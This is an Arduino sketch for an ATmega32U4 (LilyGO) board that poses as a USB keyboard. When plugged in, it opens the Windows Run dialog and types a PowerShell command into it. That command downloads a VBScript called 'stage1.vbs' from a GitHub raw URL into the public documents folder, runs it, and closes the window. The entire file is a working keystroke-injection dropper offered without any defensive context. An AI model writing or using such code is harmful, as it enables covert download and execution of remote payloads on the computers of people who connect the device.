/*ATmega32U4 (Lily GO)*/

#include "Keyboard.h"

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  Keyboard.begin();

  delay(1500);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(100);

  Keyboard.print("powershell");

  typeKey(KEY_RETURN);

  delay(500);

  Keyboard.print ("(New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/lom0rngjek/p4yl0rd/main/stage1.vbs\", \"C:\\Users\\Public\\Documents\\stage1.vbs\"); Start-Process C:\\Users\\Public\\Documents\\stage1.vbs; exit");

  typeKey(KEY_RETURN);

  delay(100);

  Keyboard.print("exit");

  typeKey(KEY_RETURN);

  Keyboard.end();
}
void loop() {}
